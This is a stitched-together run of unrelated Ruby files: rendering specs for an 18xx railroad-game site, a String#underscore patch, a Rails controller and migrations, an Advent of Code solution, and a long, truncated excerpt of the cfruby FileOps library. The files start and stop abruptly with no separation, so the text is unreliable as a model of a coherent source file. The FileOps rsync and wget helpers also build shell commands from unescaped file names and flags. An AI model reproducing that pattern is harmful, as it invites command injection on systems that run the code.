Sakaide Sukumo T TR Takamatsu Tokushima UR Uwajima Yawatahama
],
'18Chesapeake' => %w[
1 10 100 11 12 13 14 2 3 30 4 40 5 50 6 60 7 8 80 9 A Allentown Amboy
B B&O B&S Baltimore Berlin Burlington C C&A C&O
C&OC C-P Camden Charleroi Charlottesville Coal Columbia
Connellsville D D&R DC Delmarva E Easton F Fredericksburg G Green
H Hagerstown Harrisburg I J K L LV Leesburg Lynchburg N&W New
Norfolk OO Ohio PLE PRR Peninsula Philadelphia Pittsburgh Princeton
Richmond SRR Spring Strasburg Trenton Virginia Washington West
Wilmington York
],
}.each do |game_title, expected_strings|
context game_title do
it 'renders map' do
rendered = render(app_route: "/map/#{game_title}")
aggregate_failures 'expected strings' do
expected_strings.each { |s| expect(rendered).to include(s) }
end
end
end
end
end
it 'renders new_game' do
expect(render(app_route: '/new_game')).to include('Create New Game')
end
it 'renders game' do
needs = {
game_data: {
id: 1,
user: { id: 1, name: 'Player 1' },
players: [{ id: 1, name: 'Player 1' }, { id: 2, name: 'Player 2' }],
title: '1889',
actions: [],
loaded: true,
},
user: {
id: 1,
name: 'Player 1',
settings: { consent: true },
},
}
expect(render(app_route: '/game/1', **needs)).to include('Takamatsu E-Railroad')
expect(render(app_route: '/game/1#entities', **needs)).to include('Entities', 'Player 1', 'Awa Railroad')
expect(render(app_route: '/game/1#map', **needs)).to include('Kotohira')
expect(render(app_route: '/game/1#market', **needs)).to include('The Bank', 'Cash', 'Par value')
expect(render(app_route: '/game/1#info', **needs)).to include('Upcoming')
expect(render(app_route: '/game/1#tiles', **needs)).to include('492')
expect(render(app_route: '/game/1#spreadsheet', **needs)).to include('Value')
expect(render(app_route: '/game/1#tools', **needs)).to include('Clone this')
end
TEST_CASES = [
['1889',
314,
[[6, 'stock_round', 'Pass (Share)'],
[13, 'float', 'KO receives ¥700'],
[21, 'lay_track', '1889: Operating Round 1.1 (of 1) - Lay Track'],
[22, 'buy_train',
['KO must buy an available train',
'!!johnhawkhaines must contribute']],
[46, 'run_routes', '1889: Operating Round 2.1 (of 1) - Run Routes'],
[47, 'dividends', '1889: Operating Round 2.1 (of 1) - Pay or Withhold Dividends'],
[78,
'buy_company',
['1889: Operating Round 3.1 (of 1) - Buy Companies',
'Owning corporation may ignore building cost for mountain hexes']],
[81,
'track_and_buy_company',
['1889: Operating Round 3.1 (of 1) - Lay Track',
'Show companies from other players']],
[87,
'special_track',
['1889: Operating Round 3.1 (of 1) - Lay Track for Ehime Railway',
'Blocks C4 while owned by a player.']],
[336, 'discard_train', 'Discard Trains'],
[346, 'buy_train_emr', 'TR must buy an available train'],
[445,
'buy_train_emr_shares',
['KO has ¥582',
'johnhawkhaines must contribute ¥518 for KO to afford a train from the Depot',
'johnhawkhaines has ¥74 in cash',
'johnhawkhaines has ¥650 in sellable shares',
'johnhawkhaines must sell shares to raise at least ¥444',
'!!Bankruptcy']],
[nil, 'endgame', '1889: Operating Round 7.1 (of 3) - Game Over - Bankruptcy']]],
['1882',
5236,
[[399, 'sc_home_token', '1882: Stock Round 6 - Place Home Token'],
[229, 'qll_home_token', '1882: Operating Round 4.1 (of 1) - Place Home Token'],
[370, 'nwr_place_token', '1882: Operating Round 5.2 (of 2) - NWR: Place Token'],
[371, 'nwr_lay_track', '1882: Operating Round 5.2 (of 2) - NWR: Lay Track']]],
['1846',
3099,
[[0, 'draft', '1846: Draft Round 1 - Draft Companies'],
[18, 'draft', 'Mail Contract'],
[49,
'lay_track_or_token',
['1846: Operating Round 1.1 (of 2) - Place a Token or Lay Track',
# Minor charter stuff
'Michigan Southern', 'Trains', '2', 'Cash', 'C15', '$60']],
[74,
'issue_shares',
['1846: Operating Round 1.1 (of 2) - Place a Token or Lay Track',
'Issue', '1 ($50)', '2 ($100)', '3 ($150)', '4 ($200)']],
[94,
'dividend',
['Pay or Withhold Dividends',
'2 right',
'1 right',
'1 left']],
[142,
'assign',
['1846: Operating Round 2.1 (of 2) - Assign Steamboat Company',
'Blondie may assign Steamboat Company to a new hex and/or corporation or minor.',
'Add $20 per port symbol to all routes run to the assigned location '\
'by the owning/assigned corporation/minor.']],
[nil, 'endgame', '1846: Operating Round 6.2 (of 2) - Game Over - Bank Broken']]],
['1846', 'hs_cvjhogoy_1599504419', [[49, 'buy_train_emr_shares', 'has $60 in sellable shares']]],
['1846', 'hs_sudambau_1600037415', [[37, 'buy_train', ['GT has $280', '!!can issue shares']]]],
['1846',
'hs_sudambau_1600037415',
[[41,
'buy_train_issuing',
['B&O has $120',
'B&O can issue shares to raise up to $40',
'Emergency Issue',
'!!Bankruptcy']]]],
['1846',
'hs_sudambau_1600037415',
[[50,
'buy_train_president_cash',
['B&O has $146',
'Player 3 must contribute $14 for B&O to afford a train from the Depot.',
'Player 3 has $15',
'Player 3 has $0 in sellable shares',
'!!Bankruptcy']]]],
['1846',
'hs_sudambau_1600037415',
[[60,
'buy_train_bankrupt',
['B&O has $0',
'Player 3 must contribute $160 for B&O to afford a train from the Depot.',
'Player 3 has $15',
'Player 3 has $0 in sellable shares',
'Player 3 must sell shares to raise at least $145.',
'Player 3 does not have enough liquidity to contribute towards B&O buying a '\
'train from the Depot. B&O must buy a train from another corporation, or Player 3 '\
'must declare bankruptcy.',
'Declare Bankruptcy']]]],
['18AL',
4714,
[[nil, 'endgame', '18AL: Operating Round 7.2 (of 3) - Game Over - Company hit max stock value']]],
['18GA',
9222,
[[nil, 'endgame', '18GA: Operating Round 9.1 (of 3) - Game Over - Bank Broken']]],
['18TN',
7818,
[[nil, 'endgame', '18TN: Operating Round 8.2 (of 3) - Game Over - Bank Broken']]],
['18MS',
14_375,
[[nil, 'endgame', '18MS: Operating Round 10 (of 10) - Game end after OR 10 - Game Over']]],
['18MEX',
13_315,
[[278,
'merge',
['Merge',
'Decline',
'Corporations that can merge with NdM']]]],
['18MEX',
17_849,
[[nil, 'endgame', '18MEX: Operating Round 4.2 (of 2) - Game Over - Bankruptcy']]],
['1817',
20_758,
[[369,
'choose_corp_size',
['1817: Stock Round 2 - Buy or Sell Shares',
'Strasburg Railroad',
'Loans', '0/2',
'Number of Shares:', '2', '5']]]],
['1817',
15_528,
[[196,
'merge',
['Convert',
'Merge',
'Grand Trunk Western Railroad',
'Corporations that can merge with A&S']],
[205, 'offer', ['Offer for Sale', 'Warren & Trumbull Railroad']],
[383,
'merge_with_other_players',
['Convert',
'Merge',
'Pittsburgh, Shawmut and Northern Railroad',
'Corporations that can merge with J']]]],
['1817',
16_852,
[[889, 'cash_crisis', ['Player owes the bank $294 and must sell shares if possible.']]]],
['1817',
16_281,
[[812,
'buy_sell_post_conversion',
['Merger Round 4.2 (of 2) - Buy/Sell Shares Post Conversion',
'New York, Susquehanna and Western Railway']]]],
['18Chesapeake',
1905,
[[166, 'blocking_special_track', ['Lay Track for Columbia - Philadelphia Railroad']]]],
['18CO',
20_708,
[[456,
'corporate_share_buy',
['Buy Market Share',
'Buy 20% DSNG Share',
'Buy 10% DSNG Share',
'Buy DPAC Share',
'Buy DSL Share']],
[462,
'corporate_share_sale',
['Denver Pacific Railway',
'Sell 1 ($150)',
'Silverton Narrow Gauge',
'Sell 1 ($120)']],
[nil, 'pass', ['18CO: Operating Round 6.2 (of 2) - Game Over - Bank Broken']]]],
['1867',
21_268,
[[531,
'mid_convert',
['Choose Major Corporation']],
[533,
'buy_shares_post_merge',
['Buy Shares Post Merge',
'Buy Treasury Share']],
[698,
'major_nationalize',
['Nationalize Major',
'Choose if Major is nationalized',
'Grand Trunk Railway']],
[nil,
'endgame',
['Operating Round 6.3 (of 3) - Game Over']]]],
['1860',
'19_354',
[[215,
'stock_round_1',
['!!<div>Fishbourne Ferry Company',
'<div>Cowes Marina and Harbour',
'<div>Brading Harbour Company']],
[350,
'stock_round_2',
['<div>Fishbourne Ferry Company',
'<div>Cowes Marina and Harbour',
'<div>Brading Harbour Company']],
[444,
'stock_round_3',
['<div>Fishbourne Ferry Company',
'!!<div>Cowes Marina and Harbour',
'!!<div>Brading Harbour Company']],
[nil,
'endgame',
['1860: Operating Round 8.4 (Nationalization) - Game Over - Nationalization complete']]]],
].freeze
def render_game_at_action(data, action_count, string)
data['actions'] = data['actions'].take(action_count) if action_count
data[:loaded] = true
needs = {
game_data: data,
user: data['user'].merge(settings: { consent: true }),
}
html = render(app_route: "/game/#{needs[:game_data]['id']}", **needs)
strings = Array(string)
strings.each do |str|
if str =~ /^!!/
expect(html).not_to include(str.slice(2..))
else
expect(html).to include(str)
end
end
end
def render_game(jsonfile, action_count, string)
data = JSON.parse(File.read(jsonfile))
render_game_at_action(data, action_count, string)
end
TEST_CASES.each do |game, game_id, actions|
data = JSON.parse(File.read("spec/fixtures/#{game}/#{game_id}.json"))
actions.each do |action_config|
action, step, string = action_config
describe "#{game} #{game_id}" do
it "renders #{step} #{action}" do
render_game_at_action(data.dup, action, string)
end
end
end
end
it 'renders tutorial to the end' do
render_game('public/assets/tutorial.json', nil, 'Good luck and have fun!')
end
end
end

class String
def underscore
self.gsub(/::/, '/').
gsub(/([A-Z]+)([A-Z][a-z])/,'\1_\2').
gsub(/([a-z\d])([A-Z])/,'\1_\2').
tr("-", "_").
downcase
end
end
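
# Quick sanity checks for the monkey patch above:
#   "TwitterUser".underscore   # => "twitter_user"
#   "HTTPResponse".underscore  # => "http_response"
#   "Foo::BarBaz".underscore   # => "foo/bar_baz"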
r = IO.read("TwitterUser.swift").split("\n").map do |line|
next line unless line.match(/^\s*let /)
# bits = line.split("_")
# [bits[0]] + bits.drop(1).map { |b| b.capitalize }
idx = line.index(":")
line[0...idx].underscore + line[idx..-1]
end.to_a
puts r

class CurrentRoundsController < ApplicationController
respond_to :json
# GET /current_rounds
# GET /current_rounds.json
def index
render json: {
current_round: Round.current_round,
current_round_deadline: Round.deadline,
current_round_status: Round.round_status
}
end
end
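
# Example payload (hypothetical Round values):
#   GET /current_rounds
#   { "current_round": 3,
#     "current_round_deadline": "2021-06-01T00:00:00Z",
#     "current_round_status": "open" }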

class AddDetailsToUser < ActiveRecord::Migration[5.2]
def change
add_column :users, :first_name, :string
add_column :users, :last_name, :string
add_column :users, :location, :string
add_column :users, :phone, :string
add_column :users, :bio, :text
end
end

class AddIdToRights < ActiveRecord::Migration
def self.up
drop_table "user_projects"
create_table "user_projects", :force => true do |t|
t.integer "project_id", :limit => 11
t.integer "user_id", :limit => 11
t.boolean "project_admin"
end
end
def self.down
drop_table "user_projects"
create_table "user_projects", :id => false, :force => true do |t|
t.integer "project_id", :limit => 11
t.integer "user_id", :limit => 11
t.boolean "project_admin"
end
end
end

#!/usr/bin/env ruby
file_path = File.expand_path("../day-05-input.txt", __FILE__)
input = File.read(file_path).strip
loop do
prev_length = input.length
  input.gsub!(/([a-z])\1+/i) do |match|
chr = match[0]
pattern = chr.downcase + chr.upcase
match
.gsub(pattern, "")
.gsub(pattern.reverse, "")
end
break if input.length == prev_length
end
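# Sanity check: the AoC 2018 day 5 sample "dabAcCaCBAcCcaDA" reduces to
# "dabCBAcaDA" under these passes, giving a length of 10.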
puts input.length

# rtags regression test file (originally by David Powers as part of cfruby)
module Cfruby
module FileOps
# Class variable to control the behavior of FileOps.backup globally
@@backup = true
# Base class for all FileOperation specific exceptions
class FileOpsError < Cfruby::CfrubyError
end
# Raised when the requested protocol for a file operation is unknown
class FileOpsUnknownProtocolError < FileOpsError
end
# Raised when a file operation is attempted on a non-existent file
class FileOpsFileExistError < FileOpsError
end
# Raised when a move or copy will overwrite a file and :force => false
class FileOpsOverwriteError < FileOpsError
end
# Raised when a method is called on a file of the wrong type
class FileOpsWrongFiletypeError < FileOpsError
end
# Interface description for FileCommand interface. Should be
# implemented on a case by case basis and included in the get_protocol
# method.
class FileOps::FileCommand
# Moves +filename+ to +newfilename+. Options may be set to
# one or more of the following:
# <tt>:preserve</tt>:: true/false - preserve permissions
# <tt>:noop</tt>:: true/false - don't actually do anything
# <tt>:mode</tt>:: permissions - set the permissions of the copied file (uses chmod)
def move(filename, newfilename, options={})
end
# Copies +filename+ to +newfilename+. Options may be set to
# one or more of the following:
# <tt>:preserve</tt>:: true/false - preserve permissions
# <tt>:noop</tt>:: true/false - don't actually do anything
# <tt>:mode</tt>:: permissions - set the permissions of the copied file (uses chmod)
def copy(filename, newfilename, options={})
end
end
# FileCommand interface for local to local operations
class FileOps::LocalFileCommand
# Options:
# <tt>:force</tt>:: (defaults to true) force the move
# <tt>:mode</tt>:: set the mode of +newfilename+
# <tt>:preserve</tt>:: attempts to preserve the mode and ownership of newfilename if it exists
# <tt>:onlyonchange</tt>:: only copy if the file has changed (implies force)
def move(filename, newfilename, options = {})
if(options[:force] == nil)
options[:force] = true
end
currentstat = nil
Cfruby.controller.attempt("move #{filename} to #{newfilename}", 'destructive') {
if(options[:onlyonchange] and File.exist?(newfilename))
options[:force] = true
originalsum = Cfruby::Checksum::Checksum.get_checksums(filename)
newsum = Cfruby::Checksum::Checksum.get_checksums(newfilename)
if(originalsum.sha1 == newsum.sha1)
Cfruby.controller.attempt_abort("files have the same sha1 hash")
end
end
if(File.exists?(newfilename))
if(options[:preserve])
currentstat = File.stat(newfilename)
end
if(options[:force])
FileOps.delete(newfilename)
else
raise(FileOpsOverwriteError, "\"#{newfilename}\" already exists")
end
end
FileUtils.mv(filename, newfilename)
if(currentstat and options[:preserve])
FileOps.chmod(newfilename, currentstat.mode)
FileOps.chown(newfilename, currentstat.uid, currentstat.gid)
end
if(options[:mode] != nil)
FileOps.chmod(newfilename, options[:mode])
end
}
end
# Executes FileUtils.cp followed by FileOps.chmod and FileOps.chown (using :user, :group, and :mode).
# If filename is a glob it will be expanded and all resultant filenames will be copied with the assumption
# that newfilename is a directory.
# Options:
# <tt>:backup</tt>:: true to make a backup of +newfilename+ before copying
# <tt>:force</tt>:: (defaults to true) force the copy even if newfilename exists
# <tt>:onlyonchange</tt>:: only copy if the file has changed (implies force)
# <tt>:recursive</tt>:: recursively copy
def copy(filename, newfilename, options = {})
# set default options
if(options[:force] == nil)
options[:force] = true
end
if(options[:onlyonchange])
options[:force] = true
end
# first, a basic check that filename exists somehow
if(Dir.glob(filename).length == 0)
raise(FileOpsFileExistError, "\"#{filename}\" does not exist")
end
# get the base directory of the copy
basedir = File.dirname(Pathname.new(Dir.glob(filename)[0]).realpath.to_s)
basedirregex = Regexp.new(Regexp.escape(basedir) + "/?(.*)$")
# use file find to get a list of files to copy
FileFind.find(filename, options) { |filename|
# copy each file after adjusting for the base directories
basename = basedirregex.match(filename)[1]
if(File.directory?(newfilename))
copy_single(filename, newfilename + "/#{basename}", options)
else
copy_single(filename, newfilename, options)
end
}
end
# Executes FileUtils.cp followed by FileOps.chmod and FileOps.chown (using :user, :group, and :mode).
# filename and newfilename must be single files
# Options:
# <tt>:backup</tt>:: true to make a backup of +newfilename+ before copying
# <tt>:force</tt>:: (defaults to true) force the copy even if newfilename exists
# <tt>:onlyonchange</tt>:: only copy if the file has changed (implies force)
def copy_single(filename, newfilename, options = {})
mode = options[:mode]
owner = options[:user]
group = options[:group]
options.delete :mode
options.delete :user
options.delete :group
force = options[:force]
if(force == nil)
force = true
end
Cfruby.controller.attempt("copy #{filename} to #{newfilename}", 'destructive') {
if(!File.exists?(filename))
raise(FileOpsFileExistError, "\"#{filename}\" does not exist")
end
if(!force and File.exists?(newfilename))
raise(FileOpsOverwriteError, "\"#{newfilename}\" already exists")
end
if(options[:onlyonchange] and File.exist?(newfilename))
options[:force] = true
originalsum = Cfruby::Checksum::Checksum.get_checksums(filename)
newsum = Cfruby::Checksum::Checksum.get_checksums(newfilename)
if(originalsum.sha1 == newsum.sha1)
Cfruby.controller.attempt_abort("files have the same sha1 hash")
end
end
if options[:backup]
FileOps.backup(newfilename) if File.exist? newfilename
options.delete :backup
options.delete :onlyonchange
end
if(File.exists?(newfilename) and force)
FileOps.delete(newfilename)
end
if(File.directory?(filename))
FileUtils.mkdir(newfilename)
else
FileUtils.cp(filename, newfilename, :preserve => true)
end
}
# change ownership and mode if we need to
FileOps.chown(newfilename,owner,group,options) if owner or group
FileOps.chmod(newfilename,mode) if mode
end
end
# FileCommand interface for rsync operations
class FileOps::RsyncFileCommand
# Options:
# <tt>:user</tt>:: The user to use on the remote side
# <tt>:archive</tt>:: Equivilant to -a in the rsync command
# <tt>:recursive</tt>:: Recursive
# <tt>:flags</tt>:: Passed directly to the rsync command
def move(filename, newfilename, options = {})
end
# Options:
# <tt>:archive</tt>:: Equivilant to -a in the rsync command
# <tt>:recursive</tt>:: Recursive
# <tt>:flags</tt>:: Passed directly to the rsync command
def copy(filename, newfilename, options = {})
flags = Array.new()
if(options[:flags])
flags << options[:flags]
end
if(options[:archive])
flags << "-a"
end
if(options[:recursive])
flags << "-r"
end
rsynccommand = "rsync #{flags.join(' ')} #{filename} #{newfilename}"
Cfruby.controller.attempt(rsynccommand, 'destructive', 'unknown') {
Cfruby::Exec.exec(rsynccommand)
}
end
end
# FileCommand interface for http operations
class FileOps::HTTPFileCommand
def move(filename, newfilename, options = {})
raise(Exception, "HTTP move not implemented")
end
# Options:
# <tt>:recursive</tt>:: Recursive
# <tt>:flags</tt>:: Passed directly to the rsync command
def copy(filename, targetdir, options = {})
flags = Array.new()
if(options[:flags])
flags << options[:flags]
end
wgetcommand="cd #{targetdir} && "
if(options[:recursive])
wgetcommand=wgetcommand + "wget -q -np -nH -r -l inf --cut-dirs=#{filename.split(/\//).length} #{flags} http://#{filename}"
else
wgetcommand=wgetcommand + "wget -q #{flags} http://#{filename}"
end
Cfruby.controller.attempt(wgetcommand, 'destructive', 'unknown') {
Cfruby::Exec.exec(wgetcommand)
}
end
end
# Returns a FileCommand object based on the first protocol it sees
# in either filename or newfilename
def FileOps.get_protocol(filename, newfilename)
protocolregex = /^([a-zA-Z]+):\/\//
protocol = 'file'
match = protocolregex.match(filename)
if(match == nil)
match = protocolregex.match(newfilename)
end
if(match != nil)
protocol = match[1]
end
case(protocol)
when 'file'
return(LocalFileCommand.new())
when 'rsync'
return(RsyncFileCommand.new())
when 'http'
return(HTTPFileCommand.new())
else
raise(FileOpsUnknownProtocolError, "Unknown protocol - \"#{protocol}\"")
end
end
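
# Dispatch sketch (hypothetical paths):
#   FileOps.get_protocol('rsync://host/src', '/tmp/dst')   # => RsyncFileCommand instance
#   FileOps.get_protocol('http://host/file', '/tmp/file')  # => HTTPFileCommand instance
#   FileOps.get_protocol('/etc/motd', '/tmp/motd')         # => LocalFileCommand instance
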
# Moves +filename+ to +newfilename+. Options may be set to
# one or more of the following:
# <tt>:??????</tt>:: anything defined under the protocol specific copy function
def FileOps.move(filename, newfilename, options = {})
get_protocol(filename, newfilename).move(strip_protocol(filename), strip_protocol(newfilename), options)
end
# Copies +filename+ to +newfilename+. Options may be set to
# one or more of the following:
# <tt>:??????</tt>:: anything defined under the protocol specific copy function
def FileOps.copy(filename, newfilename, options = {})
get_protocol(filename, newfilename).copy(strip_protocol(filename), strip_protocol(newfilename), options)
end
# Create an empty file named +filename+
# Returns true if the file was created, false otherwise
def FileOps.touch(filename)
created = false
Cfruby.controller.attempt("touch #{filename}") {
if File.exist? filename
# if the file already exists do nothing
Cfruby.controller.attempt_abort("#{filename} already exists - won't create")
else
f = File.new(filename,File::CREAT|File::TRUNC|File::RDWR)
f.close
Cfruby.controller.inform('verbose', "created file #{filename}")
created = true
end
}
return(created)
end
# Alias for delete
def FileOps.unlink(filenamelist)
FileOps.delete(filenamelist)
end
# Creates a directory entry. +dirname+ can be an Array or String.
# Options:
# <tt>:mode</tt>:: mode of the directory
# <tt>:user</tt>:: user to own the directory
# <tt>:group</tt>:: group to own the directory
# <tt>:makeparent</tt>:: make any needed parent directories
# Returns true if a directory was created, false otherwise
def FileOps.mkdir(dirname, options = {})
if(dirname.kind_of?(String))
dirname = Array.[](dirname)
end
created = false
dirname.each { |d|
Cfruby.controller.attempt("mkdir #{d}", 'destructive') {
if(!File.directory?(d))
if(options[:makeparent])
FileUtils.mkdir_p(d)
else
FileUtils.mkdir(d)
end
created = true
mode = options[:mode]
user = options[:user] || Process.euid()
group = options[:group] || Process.egid()
FileOps.chown(d,user,group,options)
FileOps.chmod(d,mode) if mode
else
Cfruby.controller.attempt_abort("#{d} already exists")
end
}
}
return(created)
end
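
# Usage sketch (hypothetical path and ownership):
#   FileOps.mkdir('/var/www/site', :makeparent => true,
#                 :mode => 0755, :user => 'www', :group => 'www')
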
# Remove a directory entry. +dirname+ can be an Array or String.
# Returns true if a directory was removed, false otherwise
def FileOps.rmdir(dirname, force = false)
if(dirname.kind_of?(String) or dirname.kind_of?(Pathname))
dirname = Array.[](dirname)
end
deletedsomething = false
dirname.each do | d |
Cfruby.controller.attempt("rmdir #{d}", 'nonreversible', 'destructive') {
if(!test(?e, d))
Cfruby.controller.attempt_abort("#{d} does not exist")
end
if(test(?d, d))
if(force)
FileUtils.rm_rf(d)
deletedsomething = true
else
FileUtils.rmdir(d)
deletedsomething = true
end
else
raise(FileOpsWrongFiletypeError, "\"#{d}\" is not a directory")
end
}
end
return(deletedsomething)
end
# Creates a symbolic link +linkfile+ which points to +filename+.
# If +linkfile+ already exists and it is a directory, creates a symbolic link
# +linkfile/filename+. If +linkfile+ already exists and it is not a
# directory, raises FileOpsOverwriteError. Returns true if a link is made
# false otherwise.
# Options:
# <tt>:force</tt>:: if true, overwrite +linkfile+ even if it already exists
def FileOps.link(filename, linkfile, options={})
createdlink = false
if !File.exist? filename
raise(FileOpsFileExistError, "filename '#{filename}' does not exist")
else
Cfruby.controller.attempt("link '#{linkfile}' -> '#{filename}'", 'destructive') {
# Use a realpath for the filename - a relative path fails below
filename = Pathname.new(filename).realpath
if(File.exists?(linkfile))
if(File.symlink?(linkfile) and Pathname.new(linkfile).realpath == filename)
# if the link already exists do nothing
Cfruby.controller.attempt_abort("#{linkfile} already exists as a symlink")
elsif(options[:force])
unlink(linkfile)
else
raise(FileOpsOverwriteError, "#{linkfile} already exists")
end
end
FileUtils.ln_s(filename, linkfile)
createdlink = true
}
end
return(createdlink)
end
# Creates an empty file +filenames+ if the file does not already exist. +filenames+ may be
# an Array or String. If the file does exist, the mode and ownership may be adjusted. Returns
# true if a file was created, false otherwise.
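# Example (illustrative; owner and group are hypothetical):
#   FileOps.create('/etc/app.conf', 'root', 'wheel', 0640)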
def FileOps.create(filenames, owner = Process::Sys.geteuid(), group = Process::Sys.getegid(), mode = 0600)
if(filenames.kind_of?(String))
filenames = Array.[](filenames)
end
created = false
filenames.each() { |filename|
Cfruby.controller.attempt("create #{filename}", 'destructive') {
currentumask = File.umask()
begin
if(!test(?f, filename))
# set a umask that disables all access to the file by default
File.umask(0777)
File.open(filename, File::CREAT|File::WRONLY) { |fp|
}
created = true
end
chmod = FileOps.chmod(filename, mode)
chown = FileOps.chown(filename, owner, group)
if(chmod == false and chown == false)
Cfruby.controller.attempt_abort("\"#{filename}\" exists and has the appropriate owner, group, and mode")
else
created = true
end
ensure
# restore the umask
File.umask(currentumask)
end
}
}
return(created)
end
# Lock a file +fn+, using a lockfile, and return a file handle to +fn+.
# +attr+ are standard file open attributes like 'w'. File based locking is
# used to correctly handle mounted NFS and SMB shares.
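# Example (illustrative; the path is hypothetical):
#   FileOps.flock('/var/run/app.state', 'w') { |f| f.puts('checkpoint') }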
def FileOps.flock(fn, attr=nil, ext='.cflock')
Cfruby.controller.attempt("lock #{fn}") {
begin
fnlock = fn+ext
if File.exist? fnlock
Cfruby.controller.inform("warn", "File #{fn} is locked by #{fnlock} (remove to fix) - skipping!")
end
Cfruby.controller.inform('debug', "locking #{fnlock}")
fl = File.open fnlock,'w'
fl.print "pid=#{Process.pid}\nCfruby lock file"
fl.close
f = File.open fn, attr
# ---- Update file
yield f
ensure
Cfruby.controller.inform('debug', "unlock #{fnlock}")
File.unlink fnlock if fl
f.close if f
end
}
end
# Sets @@backup
def FileOps.set_backup(newbackup)
@@backup = newbackup
end
# Creates a backup copy of +filename+ with the new filename
# filename_cfruby_yyyymmdd_x, where x increments as more backups
# are added to the same directory. Options:
# <tt>:backupdir</tt>:: directory to hold the backups (defaults to the same directory as +filename+)
# <tt>:onlyonchange</tt>:: skip making a backup if a viable backup already exists.
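# Example (illustrative):
#   FileOps.backup('/etc/passwd', :backupdir => '/var/backups',
#                  :onlyonchange => true)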
def FileOps.backup(filename, options={})
if !@@backup
return
end
Cfruby.controller.attempt("backup #{filename}", 'destructive') {
if(!filename.respond_to?(:dirname))
filename = Pathname.new(filename.to_s())
end
# set the backup directory if it wasn't passed in
backupdir = options[:backupdir]
if(backupdir == nil)
backupdir = filename.dirname()
end
# find the latest backup file and test the current file against it
# if :onlyonchange is true
if(options[:onlyonchange])
backupfiles = Dir.glob("#{backupdir}/#{filename.basename()}_[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]_[0-9]*")
if(backupfiles.length > 0)
lastbackup = backupfiles.sort.reverse()[0]
currentchecksums = Cfruby::Checksum::Checksum.get_checksums(filename)
lastbackupchecksums = Cfruby::Checksum::Checksum.get_checksums(lastbackup)
if(currentchecksums.sha1 == lastbackupchecksums.sha1)
Cfruby.controller.attempt_abort("viable backup already exists \"#{lastbackup}\"")
end
end
end
tries = 3
numbermatch = /_[0-9]{8}_([0-9]+)$/
begin
nextnum = -1
# loop through any existing backup files to get the next number
Dir.glob("#{backupdir}/#{filename.basename()}_#{Time.now.strftime('%Y%m%d')}_*") { |backupfile|
match = numbermatch.match(backupfile)
if(match != nil)
if(match[1].to_i() > nextnum)
nextnum = match[1].to_i()
end
end
}
nextnum = nextnum + 1
# attempt to open it
success = false
begin
File.open("#{backupdir}/#{filename.basename()}_#{Time.now.strftime('%Y%m%d')}_#{nextnum}", File::RDONLY)
rescue Exception
FileOps.copy(filename, "#{backupdir}/#{filename.basename()}_#{Time.now.strftime('%Y%m%d')}_#{nextnum}")
success = true
end
if(false == success)
raise(Exception, "Unable to create backup copy of #{filename}")
end
rescue Exception
# we play this game three times just to try to handle possible race
# conditions between the choice of filename and the opening of the file
tries = tries - 1
if(tries < 0)
raise($!)
end
end
}
end
# Deletes files that contain no alphanumeric characters. Returns true if any files were deleted
# false otherwise
def FileOps.delete_nonalpha(basedir, options = {})
deleted = false
Cfruby.controller.attempt("deleting files non-alpha files from \"#{basedir}\"", 'nonreversible', 'destructive') {
if(FileOps.delete_not_matching_regex(basedir, /[a-zA-Z0-9]/))
deleted = true
end
}
return(deleted)
end
# Deletes matching files. Returns true if a file is actually deleted, false otherwise.
# In addition to the normal find options delete also takes:
# <tt>:force</tt>:: => (true|false) delete non-empty matching directories
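# Example (illustrative; any extra matching options are passed through to
# Cfruby::FileFind.find):
#   FileOps.delete('/tmp/stale', :force => true)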
def FileOps.delete(basedir, options = {})
deletedsomething = false
Cfruby.controller.attempt("deleting files from \"#{basedir}\"", 'nonreversible', 'destructive') {
begin
options[:returnorder] = 'delete'
Cfruby::FileFind.find(basedir, options) { |filename|
if(!filename.symlink?() and filename.directory?())
FileOps.rmdir(filename, options[:force])
else
FileOps::SymlinkHandler.unlink(filename)
end
deletedsomething = true
}
rescue Cfruby::FileFind::FileExistError
Cfruby.controller.attempt_abort("#{basedir} does not exist")
end
}
return(deletedsomething)
end
# Changes the owner, group, and mode all at once. Returns true if a change was made to
# owner, group, or mode - false otherwise. If mode==nil it is ignored.
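# Example (illustrative; user and group are hypothetical):
#   FileOps.chown_mod('/var/www/htdocs', 'www', 'www', 0644)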
def FileOps.chown_mod(basedir, owner, group, mode, options = {})
changemade = false
Cfruby.controller.attempt("changing ownership and mode of matching files in \"#{basedir}\"", 'destructive') {
usermanager = Cfruby::OS::OSFactory.new.get_os.get_user_manager()
if(owner and !owner.kind_of?(Integer))
owner = usermanager.get_uid(owner)
end
if(group and !group.kind_of?(Integer))
group = usermanager.get_gid(group)
end
Cfruby::FileFind.find(basedir, options) { |filename|
if(FileOps.chown(filename, owner, group))
changemade = true
end
if(mode!=nil and FileOps.chmod(filename, mode))
changemade = true
end
}
}
return(changemade)
end
# Disables matching files by setting all permissions to 0000. Returns true if anything
# was disabled, false otherwise.
def FileOps.disable(basedir, options = {})
disabled = false
Cfruby.controller.attempt("disabling file in \"#{basedir}\"", 'destructive') {
Cfruby::FileFind.find(basedir, options) { |filename|
if(Cfruby::FileOps.chmod(filename, 0000))
disabled = true
end
}
}
return(disabled)
end
# Chown's matching files. Returns true if a change was made, false otherwise.
def FileOps.chown(basedir, owner, group=nil, options = {})
changemade = false
usermanager = Cfruby::OS::OSFactory.new.get_os.get_user_manager()
if(owner and !owner.kind_of?(Integer))
owner = usermanager.get_uid(owner)
end
if(group and !group.kind_of?(Integer))
group = usermanager.get_gid(group)
end
Cfruby::FileFind.find(basedir, options) { |filename|
Cfruby.controller.attempt("changing ownership of \"#{filename}\" to \"#{owner}:#{group}\"", 'destructive') {
currentuid = File.stat(filename).uid
currentgid = File.stat(filename).gid
filename.chown(owner, group)
if(currentuid == File.stat(filename).uid and currentgid == File.stat(filename).gid)
Cfruby.controller.attempt_abort("unchanged, already owned by \"#{owner}:#{group}\"")
end
changemade = true
}
}
return(changemade)
end
# Chmod's matching files. Returns true if a change was made, false otherwise.
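# Example (illustrative - numeric modes use FileUtils, symbolic modes
# shell out to chmod(1)):
#   FileOps.chmod('/usr/local/bin/deploy', 0755)
#   FileOps.chmod('/usr/local/bin/deploy', 'u+x,go-w')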
def FileOps.chmod(basedir, permissions, options = {})
changemade = false
Cfruby::FileFind.find(basedir, options) { |filename|
attemptmessage = "changing permissions of \"#{filename}\" to \""
if(permissions.kind_of?(Numeric))
attemptmessage = attemptmessage + sprintf("%o\"", permissions)
else
attemptmessage = attemptmessage + "#{permissions}\""
end
Cfruby.controller.attempt(attemptmessage, 'destructive') {
currentmode = File.stat(filename).mode()
# try it with internal functions, but try to call chmod if we have to
